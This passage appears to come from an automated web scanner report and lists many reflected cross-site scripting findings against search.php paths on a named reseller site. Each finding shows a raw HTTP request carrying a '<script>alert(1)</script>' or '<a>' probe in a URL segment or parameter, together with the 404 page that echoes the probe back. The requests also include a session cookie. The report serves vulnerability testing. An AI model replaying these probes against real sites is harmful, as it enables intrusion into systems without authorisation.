<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail78bed<script>alert(1)</script>5b9b98f1537/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1790. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4940f<script>alert(1)</script>9d914f23959 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/224940f<script>alert(1)</script>9d914f23959/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/224940f<script>alert(1)</script>9d914f23959/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1791. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 433a7<script>alert(1)</script>526cf8915b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes433a7<script>alert(1)</script>526cf8915b9/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes433a7<script>alert(1)</script>526cf8915b9/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1792. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ac27<script>alert(1)</script>1358b8fa979 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos3ac27<script>alert(1)</script>1358b8fa979/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos3ac27<script>alert(1)</script>1358b8fa979/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1793. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97758<script>alert(1)</script>797f693f7a2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images97758<script>alert(1)</script>797f693f7a2/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images97758<script>alert(1)</script>797f693f7a2/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1794. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 54edd<script>alert(1)</script>878fa6ca9f7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating54edd<script>alert(1)</script>878fa6ca9f7/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating54edd<script>alert(1)</script>878fa6ca9f7/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1795. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c305e<script>alert(1)</script>d39470bd7a1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating/search.phpc305e<script>alert(1)</script>d39470bd7a1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/search.phpc305e<script>alert(1)</script>d39470bd7a1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1796. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e899b<a>dd7cd6f56e7 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searche899b<a>dd7cd6f56e7&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searche899b<a>dd7cd6f56e7&opt=2 was not found on this server.</p>
...[SNIP]...

2.1797. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 62c08<a>00cdc1afb1 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/images/rating/search.php?keyword=search...62c08<a>00cdc1afb1&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/search.php?keyword=search...62c08<a>00cdc1afb1&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1798. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1c15c<script>alert(1)</script>fffc256d02b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1c15c<script>alert(1)</script>fffc256d02b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1c15c<script>alert(1)</script>fffc256d02b=1 was not found on this server.</p>
...[SNIP]...

2.1799. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5b2a6<a>8c0b73fb3ed was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=25b2a6<a>8c0b73fb3ed HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=25b2a6<a>8c0b73fb3ed was not found on this server.</p>
...[SNIP]...

2.1800. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4cf5c<script>alert(1)</script>849cd7ba4e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4cf5c<script>alert(1)</script>849cd7ba4e7/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4cf5c<script>alert(1)</script>849cd7ba4e7/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1801. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9641<script>alert(1)</script>64f2290a80b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22c9641<script>alert(1)</script>64f2290a80b/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22c9641<script>alert(1)</script>64f2290a80b/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1802. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6b4c9<script>alert(1)</script>6882c0f1b2a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes6b4c9<script>alert(1)</script>6882c0f1b2a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes6b4c9<script>alert(1)</script>6882c0f1b2a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1803. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 18d13<script>alert(1)</script>0d80088f5fd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos18d13<script>alert(1)</script>0d80088f5fd/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos18d13<script>alert(1)</script>0d80088f5fd/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1804. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cf873<script>alert(1)</script>d766403f7ab was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/imagescf873<script>alert(1)</script>d766403f7ab/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/imagescf873<script>alert(1)</script>d766403f7ab/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1805. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4d234<script>alert(1)</script>07a970d5e71 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/search.php4d234<script>alert(1)</script>07a970d5e71?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/search.php4d234<script>alert(1)</script>07a970d5e71?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1806. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c2f6a<a>72361cf5958 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchc2f6a<a>72361cf5958&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchc2f6a<a>72361cf5958&opt=2 was not found on this server.</p>
...[SNIP]...

2.1807. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2c6a9<a>de7512f6c11 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/images/search.php?keyword=search...2c6a9<a>de7512f6c11&Submit3=Search&opt=2 HTTP/1.1
